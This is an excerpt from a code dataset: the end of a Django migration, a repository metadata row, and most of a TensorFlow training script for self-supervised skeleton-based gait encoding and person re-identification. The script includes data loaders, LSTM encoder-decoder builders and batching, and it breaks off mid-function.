class Migration(migrations.Migration):
    # Auto-generated migration (Django 3.0.8): repoints the `kind` foreign keys
    # of Culture_event and Exhibition at rest.Infrastructure with
    # on_delete=PROTECT, then drops the now-unused Cul_facility model.

    dependencies = [
        ('rest', '0025_auto_20200819_1631'),
    ]

    operations = [
        migrations.AlterField(
            model_name='culture_event',
            name='kind',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='rest.Infrastructure'),
        ),
        migrations.AlterField(
            model_name='exhibition',
            name='kind',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='rest.Infrastructure'),
        ),
        migrations.DeleteModel(
            name='Cul_facility',
        ),
    ]
| [
"qhguswkd@gmail.com"
] | qhguswkd@gmail.com |
5fc22fa8da5a8f032fb8fdb322bcdb4a0e26cda1 | 650df9246dd0338123ea6af35a5598bea33ba540 | /train.py | 76ed95d3590f48dfd55bf7f74df2d3c21c9213ae | [
"MIT"
] | permissive | 1suancaiyu/Locality-Awareness-SGE | 24f8259547ddff4d8bbd6a37313f07d1371b578e | 42f794ce1a3e1ed39c4b26a74deaa14af4a6d5e1 | refs/heads/master | 2023-04-08T18:39:33.501385 | 2021-04-25T08:32:12 | 2021-04-25T08:32:12 | 350,745,772 | 0 | 0 | MIT | 2021-03-23T14:36:45 | 2021-03-23T14:36:44 | null | UTF-8 | Python | false | false | 360,224 | py | import tensorflow as tf
from tensorflow.python.layers.core import Dense
import numpy as np
import time
import matplotlib as mpl
import copy
import os
from tensorflow.python.ops import rnn_cell_impl
# mpl.use('Agg')
# import matplotlib.pyplot as plt
import os
# ---------------------------------------------------------------------------
# Hyper-parameters and module-level state. Many of these defaults are
# overwritten by main() after the command-line flags are parsed.
# ---------------------------------------------------------------------------
# Number of Epochs
epochs = 100
# Batch Size
batch_size = 128
# RNN Size k = 256
rnn_size = 256
# Number of Layers, 2-layer LSTM
num_layers = 2
# Time Steps of Input, f = 6 skeleton frames
time_steps = 6
# Length of Series, J = 20 body joints in a sequence
series_length = 20
# Learning Rate
learning_rate = 0.0005
lr_decay = 0.95        # learning-rate decay factor
momentum = 0.5
lambda_l2_reg = 0.02   # L2 regularization weight

# Runtime options; populated from FLAGS in main().
dataset = False
attention = False
manner = False
gpu = False
permutation_flag = False
permutation_test_flag = False
permutation_test_2_flag = False
permutation = 0
test_permutation = 0
test_2_permutation = 0
Reverse = True
use_attention = True
Bi_LSTM = False
AGEs = True
Frozen = False

tf.app.flags.DEFINE_string('attention', 'LA', "(LA) Locality-oriented Attention Alignment or BA (Basic Attention Alignment)")
tf.app.flags.DEFINE_string('manner', 'ap', "average prediction (ap) or sequence-level concatenation (sc)")
tf.app.flags.DEFINE_string('dataset', 'BIWI', "Dataset: BIWI or IAS or KGBD")
# `length` is the skeleton-sequence length f (number of frames per sample).
tf.app.flags.DEFINE_string('length', '6', "4, 6, 8 or 10")
tf.app.flags.DEFINE_string('gpu', '0', "GPU number")
tf.app.flags.DEFINE_string('frozen', '0', "Freeze CAGEs for contrastive learning")
tf.app.flags.DEFINE_string('c_reid', '0', "Peform re-id use projection vectors")
tf.app.flags.DEFINE_string('t', '0.05', "Temperature for contrastive learning")
tf.app.flags.DEFINE_string('train_flag', '1', "Choose to train (1) or test (0)")
tf.app.flags.DEFINE_string('view', 'None', "Choose different views for KS20")
tf.app.flags.DEFINE_string('transfer', 'None', "Choose a dataset's encoding model to transfer encoding")
tf.app.flags.DEFINE_string('model', 'rev_rec', "prediction, sorting, rev_rec (Rev. Rec.), rev_rec_plus(Rev. Rec. Plus)")
FLAGS = tf.app.flags.FLAGS
config = tf.ConfigProto()
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
temperature = 0.1
config.gpu_options.allow_growth = True
view = 'view_'
transfer = 'None'
Model = 'rev_rec'
pre_task = 'rev_rec'
def main(_):
    """Entry point: parse flags, optionally train the self-supervised gait
    encoders per axis, build CAGEs, train the recognition network and
    evaluate re-identification performance.

    NOTE(review): the source file's indentation was lost in extraction; the
    block nesting below is a best-effort reconstruction -- verify against the
    upstream repository before relying on exact control flow.
    """
    global attention, dataset, series_length, epochs, time_steps, gpu, manner, frames_ps, \
        temperature, Frozen, C_reid, temperature, train_flag, view, use_attention, transfer, Model, pre_task
    # Pull all runtime options from the parsed command-line flags.
    attention, dataset, gpu, manner, length, Frozen, C_reid, temperature, train_flag, \
    view_num, transfer, Model = FLAGS.attention, \
                                FLAGS.dataset, FLAGS.gpu, FLAGS.manner, \
                                FLAGS.length, FLAGS.frozen, FLAGS.c_reid, \
                                FLAGS.t, FLAGS.train_flag, FLAGS.view, \
                                FLAGS.transfer, FLAGS.model,
    # Validate every flag value before any expensive work starts.
    if attention not in ['BA', 'LA']:
        raise Exception('Attention must be BA or LA.')
    if manner not in ['sc', 'ap']:
        raise Exception('Training manner must be sc or ap.')
    if dataset not in ['BIWI', 'IAS', 'KGBD', 'KinectReID', 'KS20']:
        raise Exception('Dataset must be BIWI, IAS, KGBD, KinectReID or KS20.')
    if not gpu.isdigit() or int(gpu) < 0:
        raise Exception('GPU number must be a positive integer.')
    if length not in ['4', '6', '8', '10']:
        raise Exception('Length number must be 4, 6, 8 or 10.')
    if Frozen not in ['0', '1']:
        raise Exception('Frozen state must be 0 or 1.')
    if C_reid not in ['0', '1']:
        raise Exception('C_reid state must be 0 or 1.')
    if train_flag not in ['0', '1', '2']:
        raise Exception('Train_flag must be 0, 1, or 2 (Only Evaluation).')
    if view_num not in ['0', '1', '2', '3', '4', 'None']:
        raise Exception('View_num must be 0, 1, 2, 3, 4 or None')
    if transfer not in ['BIWI', 'IAS', 'KGBD', 'KS20', 'None']:
        raise Exception('Transfer dataset must be BIWI, IAS, KGBD, KS20 or None')
    if Model not in ['rev_rec', 'rev_rec_plus', 'prediction', 'sorting']:
        raise Exception('Model must be prediction, sorting, rev_rec or rev_rec_plus')
    os.environ['CUDA_VISIBLE_DEVICES'] = gpu
    folder_name = dataset + '_' + attention
    # KS20 skeletons have 25 joints; the other datasets use 20.
    series_length = 20
    if dataset == 'KS20':
        series_length = 25
    view += view_num
    if view_num == 'None':
        view = ''
    if transfer != 'None':
        # Transfer evaluation re-uses a trained encoder, so skip encoder training.
        train_flag = '0'
    # time_steps = 6
    time_steps = int(length)
    temperature = float(temperature)
    pre_task = Model
    # wsx
    frames_ps = dataset + '/' + str(time_steps) + '/'
    epochs = 400
    if dataset != 'KS20':
        view = ''
    # if dataset == 'KGBD':
    #     epochs = 100
    # Obtain CAGEs
    # Train self-supervised gait encoding model on X, Y, Z
    # NOTE(review): this overrides the `--t` flag value unconditionally.
    if dataset == 'KGBD':
        temperature = 0.5
    else:
        temperature = 0.1
    if Model == 'rev_rec_plus':
        # rev_rec uses 'LA' and other two pretext tasks use 'BA'
        attention = 'BA'
    print(
        ' ## Dataset: %s\n ## Attention: %s\n ## Re-ID Manner: %s\n ## Sequence Length: %s\n ## Tempearture: %s\n ## Pretext Task: %s\n ## GPU: %s\n' %
        (dataset, attention, manner, str(time_steps), str(temperature), Model, str(gpu)))
    if train_flag == '1':
        print(' ## Training Gait Encoding Model: True')
    else:
        print(' ## Training Gait Encoding Model: False')
    print(' ## Training Recognition Network: True\n')
    if train_flag == '1' and Model != 'rev_rec_plus':
        # Train one gait-encoding model per coordinate axis (x, y, z).
        try:
            os.mkdir('./Models/Gait_Encoding_models')
        except:
            pass
        folder_name = './Models/Gait_Encoding_models/' + folder_name
        for i in ['x', 'y', 'z']:
            try:
                os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
            except:
                pass
            train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
    elif train_flag == '1' and Model == 'rev_rec_plus':
        # Rev. Rec. Plus: train all three pretext tasks, then combine CAGEs.
        print(' ## Training Three Types of Gait Encoding Model: (1) Rev. Rec. (2) Prediction (3) Sorting, and Combine CAGEs to Train RN')
        attention = 'LA'
        folder_name = dataset + '_' + attention
        try:
            os.mkdir('./Models/Gait_Encoding_models')
        except:
            pass
        folder_name = './Models/Gait_Encoding_models/' + folder_name
        # Rev. Rec.
        pre_task = 'rev_rec'
        for i in ['x', 'y', 'z']:
            try:
                os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
            except:
                pass
            train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
        # Prediction
        attention = 'BA'
        folder_name = dataset + '_' + attention
        folder_name = './Models/Gait_Encoding_models/' + folder_name
        pre_task = 'prediction'
        for i in ['x', 'y', 'z']:
            try:
                os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
            except:
                pass
            train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
        # Sorting
        attention = 'BA'
        folder_name = dataset + '_' + attention
        folder_name = './Models/Gait_Encoding_models/' + folder_name
        pre_task = 'sorting'
        for i in ['x', 'y', 'z']:
            try:
                os.mkdir(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task)
            except:
                pass
            train(folder_name + '_' + i + '_' + str(time_steps) + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + pre_task, i, train_dataset=dataset)
        pre_task = 'rev_rec_plus'
    print('Generate CAGEs')
    # IAS has two test splits (IAS-A / IAS-B), hence the extra return values.
    if dataset == 'IAS':
        X, X_y, t_X, t_X_y, t_2_X, t_2_X_y, t_X_att = encoder_classify(dataset + '_' + attention + 'x',
                                                                       'x', 'att', dataset)
        Y, Y_y, t_Y, t_Y_y, t_2_Y, t_2_Y_y, t_Y_att = encoder_classify(dataset + '_' + attention + 'y',
                                                                       'y', 'att', dataset)
        Z, Z_y, t_Z, t_Z_y, t_2_Z, t_2_Z_y, t_Z_att = encoder_classify(dataset + '_' + attention + 'z',
                                                                       'z', 'att', dataset)
    else:
        X, X_y, t_X, t_X_y, t_X_att = encoder_classify(dataset + '_' + attention + 'x', 'x', 'att', dataset)
        Y, Y_y, t_Y, t_Y_y, t_Y_att = encoder_classify(dataset + '_' + attention + 'y', 'y', 'att', dataset)
        Z, Z_y, t_Z, t_Z_y, t_Z_att = encoder_classify(dataset + '_' + attention + 'z', 'z', 'att', dataset)
    # Labels from the three axes must agree sample-for-sample.
    assert X_y.tolist() == Y_y.tolist() and Y_y.tolist() == Z_y.tolist()
    assert t_X_y.tolist() == t_Y_y.tolist() and t_Y_y.tolist() == t_Z_y.tolist()
    # Concatenate per-axis CAGEs into a single feature matrix.
    X = np.column_stack([X, Y, Z])
    y = X_y
    t_X = np.column_stack([t_X, t_Y, t_Z])
    t_y = t_X_y
    if dataset == 'IAS':
        t_2_X = np.column_stack([t_2_X, t_2_Y, t_2_Z])
        t_2_y = t_2_X_y
    if train_flag == '0' or train_flag == '1':
        # direct evaluation
        print('Train a recognition network on CAGEs')
        if dataset == 'IAS':
            if Model == 'rev_rec_plus':
                encoder_classify_union_directly_IAS(X, y, t_X, t_y, t_2_X, t_2_y, './Models/CAGEs_RN_models',
                                                    dataset + '_RN_' + manner + '_' + str(time_steps)
                                                    + '_' + str(temperature) + '_' + str(Frozen) + 'pre_' + Model,
                                                    dataset)
            else:
                encoder_classify_union_directly_IAS(X, y, t_X, t_y, t_2_X, t_2_y, './Models/CAGEs_RN_models',
                                                    dataset + '_' + attention + '_RN_' + manner + '_' + str(time_steps)
                                                    + '_' + str(temperature) + '_' + str(Frozen) + 'pre_' + Model, dataset)
        else:
            if Model == 'rev_rec_plus':
                encoder_classify_union_directly(X, y, t_X, t_y, './Models/CAGEs_RN_models',
                                                dataset + '_RN_' + manner + '_' + str(time_steps) + '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_' + Model, dataset)
            else:
                encoder_classify_union_directly(X, y, t_X, t_y, './Models/CAGEs_RN_models',
                                                dataset + '_' + attention + '_RN_' + manner + '_' + str(
                                                    time_steps) + '_' + str(temperature) + '_' + str(
                                                    Frozen) + view + 'pre_' + Model, dataset)
    print ('Dataset: %s' % dataset)
    if dataset == 'KS20':
        print ('View: %s' % view)
    if Model == 'rev_rec_plus':
        evaluate_reid('./Models/CAGEs_RN_models/' + dataset + '_RN_' + manner + '_' + str(time_steps)
                      + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
    else:
        evaluate_reid('./Models/CAGEs_RN_models/' + dataset + '_' + attention + '_RN_' + manner + '_' + str(time_steps)
                      + '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
def get_inputs():
    """Create the graph's input placeholders plus the learning-rate variable
    and its decay op; returns them in the order the callers unpack."""
    seq_shape = [batch_size, time_steps, series_length]
    enc_inputs = tf.placeholder(tf.float32, seq_shape, name='inputs')
    dec_targets = tf.placeholder(tf.float32, seq_shape, name='targets')

    lr = tf.Variable(0.001, trainable=False, dtype=tf.float32, name='learning_rate')
    lr_decay_op = lr.assign(lr * 0.5)

    tgt_seq_len = tf.placeholder(tf.int32, (None, ), name='target_sequence_length')
    max_tgt_seq_len = tf.reduce_max(tgt_seq_len, name='max_target_len')
    src_seq_len = tf.placeholder(tf.int32, (None, ), name='source_sequence_length')
    keep_prob = tf.placeholder(tf.float32, name='keep_prob')

    return (enc_inputs, dec_targets, lr, lr_decay_op, tgt_seq_len,
            max_tgt_seq_len, src_seq_len, keep_prob)
def get_data_KGBD(dimension, fr):
    """Load KGBD training sequences for one coordinate axis and build the
    (input, target) pairs required by the selected pretext task."""
    base = 'Datasets/' + frames_ps + 'KGBD_train_npy_data/'
    src = np.load(base + 'source_' + dimension + '_KGBD_' + str(fr) + '.npy')
    src = src.reshape([-1, time_steps, series_length])
    if Model in ('rev_rec', 'rev_rec_plus'):
        # Reverse reconstruction: targets are the pre-computed reversed sequences.
        tgt = np.load(base + 'target_' + dimension + '_KGBD_' + str(fr) + '.npy')
        tgt = tgt.reshape([-1, time_steps, series_length])
    elif Model == 'prediction':
        # Prediction: target of sequence i is sequence i+1; the last repeats itself.
        tgt = np.concatenate((src[1:, :, :], src[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
    elif Model == 'sorting':
        # Sorting: targets keep the original frame order, inputs are shuffled.
        tgt = copy.deepcopy(src)
        for idx in range(src.shape[0]):
            src[idx] = src[idx, np.random.permutation(time_steps)]
    return src.tolist(), tgt.tolist()
def get_data_KinectReID(dimension, fr):
    """Load KinectReID source/target sequence pairs (reverse-reconstruction only)."""
    prefix = 'Datasets/' + frames_ps + 'KinectReID_train_npy_data/'
    suffix = dimension + '_KinectReID_' + str(fr) + '.npy'
    src = np.load(prefix + 'source_' + suffix).reshape([-1, time_steps, series_length])
    tgt = np.load(prefix + 'target_' + suffix).reshape([-1, time_steps, series_length])
    return src.tolist(), tgt.tolist()
def get_data_KS20(dimension, fr):
    """Load KS20 training sequences (optionally from a view-specific folder)
    and build (input, target) pairs for the selected pretext task."""
    global view
    view_dir = view + '/' if view != '' else ''
    base = 'Datasets/' + frames_ps + view_dir + 'KS20_train_npy_data/'
    src = np.load(base + 'source_' + dimension + '_KS20_' + str(fr) + '.npy')
    src = src.reshape([-1, time_steps, series_length])
    if Model in ('rev_rec', 'rev_rec_plus'):
        # Reverse reconstruction: targets are the pre-computed reversed sequences.
        tgt = np.load(base + 'target_' + dimension + '_KS20_' + str(fr) + '.npy')
        tgt = tgt.reshape([-1, time_steps, series_length])
    elif Model == 'prediction':
        # Prediction: target of sequence i is sequence i+1; the last repeats itself.
        tgt = np.concatenate((src[1:, :, :], src[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
    elif Model == 'sorting':
        # Sorting: targets keep the original frame order, inputs are shuffled.
        tgt = copy.deepcopy(src)
        for idx in range(src.shape[0]):
            src[idx] = src[idx, np.random.permutation(time_steps)]
    return src.tolist(), tgt.tolist()
def get_data_IAS(dimension, fr):
    """
    Load IAS training skeleton sequences for one coordinate dimension and
    build (input, target) pairs for the pretext task selected by the global
    `Model` ('rev_rec'/'rev_rec_plus', 'prediction', or 'sorting').

    parameters:
        - dimension: coordinate dimension name ('x', 'y' or 'z')
        - fr: number of frames per sequence (time_steps)
    returns:
        (input_data, targets) as nested lists of shape
        (samples, time_steps, series_length)
    """
    src_path = 'Datasets/' + frames_ps + 'IAS_train_npy_data/source_' + dimension + '_IAS_' + str(fr) + '.npy'
    input_data = np.load(src_path).reshape([-1, time_steps, series_length])
    if Model == 'rev_rec' or Model == 'rev_rec_plus':
        # reverse reconstruction: targets are pre-computed and stored on disk
        input_data = input_data.tolist()
        tgt_path = 'Datasets/' + frames_ps + 'IAS_train_npy_data/target_' + dimension + '_IAS_' + str(fr) + '.npy'
        targets = np.load(tgt_path).reshape([-1, time_steps, series_length]).tolist()
    elif Model == 'prediction':
        # target of sample i is sample i+1; the last sample repeats itself
        last_repeated = input_data[-1, :, :].reshape([1, time_steps, series_length])
        targets = np.concatenate((input_data[1:, :, :], last_repeated), axis=0)
        input_data = input_data.tolist()
        targets = targets.tolist()
    elif Model == 'sorting':
        # sorting: target is the ordered sequence, input frames get shuffled
        targets = copy.deepcopy(input_data)
        for sample_idx in range(input_data.shape[0]):
            shuffled_order = np.random.permutation(time_steps)
            input_data[sample_idx] = input_data[sample_idx, shuffled_order]
        input_data = input_data.tolist()
        targets = targets.tolist()
    return input_data, targets
# suancaiyu
def get_data_BIWI(dimension, fr):
    """
    Load BIWI training skeleton sequences for one coordinate dimension,
    build (input, target) pairs for the pretext task selected by the global
    `Model`, and split them into a training part (first 2/3 of the samples)
    and a held-out part (last 1/3).

    parameters:
        - dimension: coordinate dimension name ('x', 'y' or 'z')
        - fr: number of frames per sequence (time_steps)
    returns:
        (train_inputs, train_targets, heldout_inputs, heldout_targets)
        as nested lists of shape (samples, time_steps, series_length)
    """
    input_data = np.load('Datasets/' + frames_ps + 'BIWI_train_npy_data/source_' + dimension + '_BIWI_' + str(fr) + '.npy')
    input_data = input_data.reshape([-1, time_steps, series_length])
    if Model == 'rev_rec' or Model == 'rev_rec_plus':
        # reverse reconstruction: targets are pre-computed and stored on disk
        input_data = input_data.tolist()
        targets = np.load('Datasets/'+ frames_ps +'BIWI_train_npy_data/target_' + dimension + '_BIWI_' + str(fr) + '.npy')
        targets = targets.reshape([-1, time_steps, series_length])
        targets = targets.tolist()
    elif Model == 'prediction':
        # target of sample i is sample i+1; the last sample repeats itself
        targets = np.concatenate((input_data[1:, :, :], input_data[-1, :, :].reshape([1, time_steps, series_length])),
                                 axis=0)
        input_data = input_data.tolist()
        targets = targets.tolist()
    elif Model == 'sorting':
        # sorting: target is the ordered sequence, input frames get shuffled
        targets = copy.deepcopy(input_data)
        for i in range(input_data.shape[0]):
            permutation_ = np.random.permutation(time_steps)
            input_data[i] = input_data[i, permutation_]
        input_data = input_data.tolist()
        targets = targets.tolist()
    # hold out the last third of the samples (e.g. for validation/testing)
    split = len(input_data) // 3
    return input_data[:-split], targets[:-split], input_data[-split:], targets[-split:]
def pad_batch(batch_data, pad_int):
    """
    Pad every sequence in the batch with `pad_int` so that all sequences
    share the length of the longest one.

    parameters:
        - batch_data: list of sequences (each itself a list)
        - pad_int: padding value (0)
    returns:
        list of equal-length sequences
    """
    longest = max(len(seq) for seq in batch_data)
    padded = []
    for seq in batch_data:
        padded.append(seq + [pad_int] * (longest - len(seq)))
    return padded
def get_batches(targets, sources, batch_size, source_pad_int, target_pad_int):
    """
    Yield mini-batches of (padded targets, padded sources) plus the
    per-sequence lengths of each batch. Samples that do not fill a
    complete batch are dropped.
    """
    for batch_idx in range(len(sources) // batch_size):
        start = batch_idx * batch_size
        src_batch = sources[start:start + batch_size]
        tgt_batch = targets[start:start + batch_size]
        # equalize sequence lengths inside the batch via padding
        padded_src = np.array(pad_batch(src_batch, source_pad_int))
        padded_tgt = np.array(pad_batch(tgt_batch, target_pad_int))
        # record sequence lengths (not strictly necessary downstream)
        tgt_lens = [len(seq) for seq in tgt_batch]
        src_lens = [len(seq) for seq in src_batch]
        yield padded_tgt, padded_src, tgt_lens, src_lens
def get_batches_plain(targets, sources, batch_size, source_pad_int, target_pad_int):
    """
    Yield mini-batches exactly like `get_batches`, except that the target
    batch is taken from `sources` as well (plain reconstruction: inputs
    reconstruct themselves; the `targets` argument is not used).
    """
    for batch_idx in range(len(sources) // batch_size):
        start = batch_idx * batch_size
        src_batch = sources[start:start + batch_size]
        # targets deliberately come from sources (plain/self reconstruction)
        tgt_batch = sources[start:start + batch_size]
        padded_src = np.array(pad_batch(src_batch, source_pad_int))
        padded_tgt = np.array(pad_batch(tgt_batch, target_pad_int))
        # record sequence lengths (not strictly necessary downstream)
        tgt_lens = [len(seq) for seq in tgt_batch]
        src_lens = [len(seq) for seq in src_batch]
        yield padded_tgt, padded_src, tgt_lens, src_lens
def GE(input_data, rnn_size, num_layers, source_sequence_length, encoding_embedding_size):
    '''
    Gait Encoder (GE): multi-layer LSTM encoder over skeleton sequences.

    Parameters:
        - input_data: skeleton sequences (X, Y or Z coordinate series)
        - rnn_size: hidden units per LSTM layer (256)
        - num_layers: number of stacked LSTM layers (2)
        - source_sequence_length: per-sample sequence lengths
        - encoding_embedding_size: embedding size (unused here; inputs are fed directly)

    Returns:
        (encoder_output, encoder_state, weights, source_sequence_length).
        With the global Bi_LSTM flag set, forward/backward states are summed
        per layer into a single LSTMStateTuple pair and only the forward
        direction's outputs are returned.
    '''
    encoder_embed_input = input_data
    def get_lstm_cell(rnn_size):
        # fixed seed keeps cell initialization reproducible across runs
        lstm_cell = tf.contrib.rnn.LSTMCell(rnn_size, initializer=tf.random_uniform_initializer(-0.1, 0.1, seed=2))
        # if use_dropout:
        #     lstm_cell = tf.contrib.rnn.DropoutWrapper(lstm_cell, output_keep_prob=0.5)
        return lstm_cell
    if Bi_LSTM:
        fw_cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell(rnn_size) for _ in range(num_layers)])
        bw_cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell(rnn_size) for _ in range(num_layers)])
        encoder_output, encoder_state = \
            tf.nn.bidirectional_dynamic_rnn(fw_cell, bw_cell, encoder_embed_input, sequence_length=source_sequence_length, dtype=tf.float32)
        # only the forward cell's variables are exposed to the caller
        weights = fw_cell.variables
        # print(encoder_state)
        # print('1')
        # print(encoder_output)
        # exit(1)
    else:
        cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell(rnn_size) for _ in range(num_layers)])
        encoder_output, encoder_state = tf.nn.dynamic_rnn(cell, encoder_embed_input,
                                                          sequence_length=source_sequence_length, dtype=tf.float32)
        weights = cell.variables
    if Bi_LSTM:
        # print(encoder_state)
        # exit(1)
        # Fuse backward and forward states by element-wise sum, per layer:
        # index layout is encoder_state[direction][layer][c_or_h]
        c_1 = encoder_state[1][1][0] + encoder_state[0][1][0]
        h_1 = encoder_state[1][1][1] + encoder_state[0][1][1]
        c_0 = encoder_state[1][0][0] + encoder_state[0][0][0]
        h_0 = encoder_state[1][0][1] + encoder_state[0][0][1]
        # bidirectional_rnn/fw/fw/transpose_1:0
        # ReverseSequence: 0
        # encoder_output[0] is the forward direction's output tensor
        return encoder_output[0], (rnn_cell_impl.LSTMStateTuple(c_0, h_0), rnn_cell_impl.LSTMStateTuple(c_1, h_1)), weights, source_sequence_length
    else:
        return encoder_output, encoder_state, weights, source_sequence_length
def GD(decoding_embedding_size, num_layers, rnn_size,
       target_sequence_length, source_sequence_length, max_target_sequence_length, encoder_output, encoder_state, decoder_input):
    '''
    Gait Decoder (GD): multi-layer LSTM decoder (optionally with Luong
    attention over the encoder outputs) that reconstructs skeleton frames.

    parameters:
        - decoding_embedding_size: embedding size (unused; inputs fed directly)
        - num_layers: number of stacked LSTM layers (2)
        - rnn_size: hidden units per layer (256)
        - target_sequence_length: per-sample target lengths
        - source_sequence_length: per-sample source lengths (for attention masking)
        - max_target_sequence_length: decode-step cap
        - encoder_output: encoder outputs (attention memory)
        - encoder_state: encoder final state (decoder initial state)
        - decoder_input: shifted target sequence fed in teacher-forcing mode

    returns:
        (training_decoder_output, predicting_decoder_output,
         training_decoder_state, predicting_decoder_state)
    '''
    decoder_embed_input = decoder_input
    def get_decoder_cell(rnn_size):
        # fixed seed keeps cell initialization reproducible across runs
        decoder_cell = tf.contrib.rnn.LSTMCell(rnn_size,
                                               initializer=tf.random_uniform_initializer(-0.1, 0.1, seed=2))
        return decoder_cell
    cell = tf.contrib.rnn.MultiRNNCell([get_decoder_cell(rnn_size) for _ in range(num_layers)])
    if use_attention:
        # Luong attention over encoder outputs; alignment_history=True keeps
        # the per-step attention matrices retrievable for the attention loss
        attention_mechanism = tf.contrib.seq2seq.LuongAttention(num_units=rnn_size, memory=encoder_output,
                                                                memory_sequence_length=source_sequence_length)
        cell = tf.contrib.seq2seq.AttentionWrapper(cell=cell, attention_mechanism=attention_mechanism,
                                                   attention_layer_size=rnn_size, alignment_history=True, output_attention=True,
                                                   name='Attention_Wrapper')
    # FC layer projecting the decoder state back to one skeleton frame
    output_layer = Dense(series_length,
                         use_bias=True,
                         kernel_initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.1))
    with tf.variable_scope("decode"):
        # teacher forcing: ground-truth frames are fed at every step
        training_helper = tf.contrib.seq2seq.TrainingHelper(inputs=decoder_embed_input,
                                                            sequence_length=target_sequence_length,
                                                            time_major=False)
        if not use_attention:
            training_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
                                                               training_helper,
                                                               encoder_state,
                                                               output_layer)
        else:
            # AttentionWrapper needs its own state object wrapping the encoder state
            decoder_initial_state = cell.zero_state(batch_size=batch_size, dtype=tf.float32).clone(
                cell_state=encoder_state)
            training_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
                                                               training_helper,
                                                               initial_state=decoder_initial_state,
                                                               output_layer=output_layer,
                                                               )
        training_decoder_output, training_decoder_state, _ = tf.contrib.seq2seq.dynamic_decode(training_decoder,
                                                                                               impute_finished=True,
                                                                                               maximum_iterations=max_target_sequence_length)
    with tf.variable_scope("decode", reuse=True):
        # Inference-time helper: feeds the decoder's own previous output back
        # as the next input (auto-regressive decoding).
        def initialize_fn():
            finished = tf.tile([False], [batch_size])
            start_inputs = decoder_embed_input[:, 0]
            return (finished, start_inputs)
        def sample_fn(time, outputs, state):
            # sample ids are unused; a dummy constant satisfies the interface
            del time, state
            return tf.constant([0] * batch_size)
        def next_inputs_fn(time, outputs, state, sample_ids):
            del sample_ids
            finished = time >= tf.shape(decoder_embed_input)[1]
            all_finished = tf.reduce_all(finished)
            next_inputs = tf.cond(
                all_finished,
                lambda: tf.zeros_like(outputs),
                lambda: outputs)
            return (finished, next_inputs, state)
        predicting_helper = tf.contrib.seq2seq.CustomHelper(initialize_fn=initialize_fn,
                                                            sample_fn=sample_fn,
                                                            next_inputs_fn=next_inputs_fn)
        if not use_attention:
            predicting_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
                                                                 predicting_helper,
                                                                 encoder_state,
                                                                 output_layer)
        else:
            decoder_initial_state = cell.zero_state(batch_size=batch_size, dtype=tf.float32).clone(
                cell_state=encoder_state)
            predicting_decoder = tf.contrib.seq2seq.BasicDecoder(cell,
                                                                 predicting_helper,
                                                                 initial_state=decoder_initial_state,
                                                                 output_layer=output_layer)
        predicting_decoder_output, predicting_decoder_state, _ = tf.contrib.seq2seq.dynamic_decode(predicting_decoder,
                                                                                                   impute_finished=True,
                                                                                                   maximum_iterations=max_target_sequence_length)
    return training_decoder_output, predicting_decoder_output, training_decoder_state, predicting_decoder_state
#suancaiyu
def process_decoder_input(data, batch_size):
    '''
    Build the decoder's teacher-forcing input from the target sequence by
    dropping the last frame and prepending zero frames.

    NOTE(review): the zero prefix spans `time_steps` frames while `ending`
    keeps time_steps-1 frames, so the concatenation yields
    (batch_size, 2*time_steps - 1, series_length) instead of a one-frame
    shift (which would use tf.fill([batch_size, 1, series_length], 0.)).
    The decoder only reads `target_sequence_length` steps, so confirm this
    prefix length is intended.

    parameters:
        - data: target sequences, shape (batch_size, time_steps, series_length)
        - batch_size: number of sequences in the batch
    returns:
        decoder input tensor with zero start frames prepended
    '''
    # drop the last frame of every target sequence
    ending = tf.strided_slice(data, [0, 0, 0], [batch_size, -1, series_length], [1, 1, 1])
    # prepend zero frames as the decoder's start-of-sequence input
    decoder_input = tf.concat([tf.fill([batch_size, time_steps, series_length], 0.), ending], 1)
    return decoder_input
#suancaiyu
def encoder_decoder(input_data, targets, lr, target_sequence_length,
                    max_target_sequence_length, source_sequence_length,
                    encoder_embedding_size, decoder_embedding_size,
                    rnn_size, num_layers):
    '''
    Wire the Gait Encoder (GE) and Gait Decoder (GD) into one graph.

    Note: `lr`, `encoder_embedding_size` and `decoder_embedding_size` are
    accepted for interface compatibility but unused — fixed sizes of 128
    are used below instead.

    returns:
        (training_decoder_output, predicting_decoder_output,
         lstm_weights_1, lstm_weights_2[, attention_matrices])
        where attention_matrices is only returned when the global
        `use_attention` flag is set.
    '''
    encoding_embedding_size = 128
    decoding_embedding_size = 128
    # encode the skeleton sequences
    encoder_output, encoder_state, weights, source_sequence_length = GE(input_data,
                                                                        rnn_size,
                                                                        num_layers,
                                                                        source_sequence_length,
                                                                        encoding_embedding_size)
    # build teacher-forcing decoder input from the targets
    decoder_input = process_decoder_input(targets, batch_size)
    # snapshot encoder LSTM kernels as named variables (weights[0]/weights[3]
    # are the two layers' kernels as exposed by the encoder cell)
    lstm_weights_1 = tf.Variable(weights[0], dtype=tf.float32, name='lstm_weights_layer_1')
